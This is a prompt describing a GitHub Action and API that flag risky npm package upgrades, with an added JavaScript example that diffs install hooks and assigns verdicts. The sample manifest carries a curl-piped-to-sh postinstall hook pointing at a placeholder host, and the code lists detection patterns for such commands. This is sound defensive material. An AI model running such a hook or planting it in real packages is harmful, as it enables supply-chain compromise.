Javeria-taj/preflight-ai — reverse-engineered prompt

Reverse engineered prompt


Build me Preflight, a security tool that protects JavaScript projects from dangerous package updates before they run.

I want a GitHub Action that scans pull requests when dependencies change, compares the old and new package versions, sends the result to an API, and comments on the PR with a clear PASS, WARN, or BLOCK verdict. If something looks malicious, it should fail the check so the merge is blocked.

Also build the backend API that analyzes package upgrades using install script changes, simple JavaScript static scanning, npm maintainer reputation signals, and Gemini to write a human-readable explanation. Save scan history in MongoDB.

Build a dark, SOC-style web dashboard where I can see recent scans, verdicts, confidence, top risky packages, and a detailed scan page with the timeline, signals, and AI reasoning.

Please wire the frontend, API, and action together enough to run locally, with clear env setup for MongoDB, Gemini, and the API URL. Look up current docs online if needed.
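
The install-script comparison and PASS/WARN/BLOCK verdict requested in the prompt could look like the following. This is an added example, not part of the original prompt or the Preflight project's code. The function names, the suspicious-command patterns, the verdict mapping and the sample manifests are all assumptions made for illustration.

```javascript
// Lifecycle hooks npm runs automatically when a package is installed.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Assumed heuristics (not from the Preflight project): command shapes that
// rarely belong in the install hook of a routine version bump.
const SUSPICIOUS = [
  { name: "network-fetch", re: /\b(curl|wget)\b/i },
  { name: "pipe-to-shell", re: /\|\s*(sh|bash)\b/i },
  { name: "inline-eval", re: /\bnode\s+(-e|--eval)\b/i },
  { name: "base64-decode", re: /\bbase64\b/i },
];

// Compare the install hooks of two package.json objects (old vs. new version).
function diffInstallScripts(oldManifest, newManifest) {
  const before = (oldManifest && oldManifest.scripts) || {};
  const after = (newManifest && newManifest.scripts) || {};
  const changes = [];
  for (const hook of INSTALL_HOOKS) {
    const prev = typeof before[hook] === "string" ? before[hook] : null;
    const next = typeof after[hook] === "string" ? after[hook] : null;
    if (prev === next) continue; // hook untouched by the upgrade
    const kind = prev === null ? "added" : next === null ? "removed" : "changed";
    // Only the command that would run after the upgrade is scanned.
    const signals = next === null
      ? []
      : SUSPICIOUS.filter((s) => s.re.test(next)).map((s) => s.name);
    changes.push({ hook, kind, before: prev, after: next, signals });
  }
  return changes;
}

// Assumed mapping: BLOCK on any suspicious new command, WARN on any other
// added or changed hook, PASS when nothing new would run at install time.
function verdictFor(changes) {
  if (changes.some((c) => c.signals.length > 0)) return "BLOCK";
  if (changes.some((c) => c.kind !== "removed")) return "WARN";
  return "PASS";
}

// Constructed sample manifests (package name, versions and command are made up).
const oldPkg = { name: "example-lib", version: "1.4.2", scripts: { test: "jest" } };
const newPkg = {
  name: "example-lib",
  version: "1.4.3",
  scripts: { test: "jest", postinstall: "curl -s https://example.invalid/setup.sh | sh" },
};

const sampleChanges = diffInstallScripts(oldPkg, newPkg);
console.log(verdictFor(sampleChanges), JSON.stringify(sampleChanges, null, 2));
```

A hook that is added without matching any pattern (for example `node-gyp rebuild`) yields WARN rather than PASS, since any new install-time command is worth a reviewer's attention.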
